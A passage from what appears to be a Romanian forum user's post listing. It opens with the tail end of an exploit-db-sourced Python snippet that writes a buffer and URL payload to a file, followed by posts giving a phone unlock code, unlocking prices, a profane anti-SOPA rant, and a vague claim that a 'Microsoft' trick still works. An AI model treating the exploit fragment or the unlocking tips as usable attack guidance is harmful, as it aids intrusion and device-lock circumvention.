open(filename , 'w') textfile.write(file+buffer+binnu+URL2+nxt) textfile.close() source: exploit-db.com
  22. The_Arhitect
    Incearca asta: #pw+4267324516 +1#
  23. The_Arhitect
    Pentru telefonul tau coasta cam 20e de decodat, nu merge decodat prin IMEI.
  24. The_Arhitect
    Ma f** pe SOPA lor , si ce crezi ca o sa le inchida? mare bullshit numai vorba de toti dai in cacat.... Ia uite ba ca nu vrea sa rimeze , rimeaza ma ca te ea mama dreacu. )0
  25. The_Arhitect
    Poate tie nu mai merge treaba cu Microsoft , dar eu am incercat acun 1 saptamana si a mers ) ps. Trebuie sa ai si ceva experienta in acest domeniu.
×
×
  • Create New...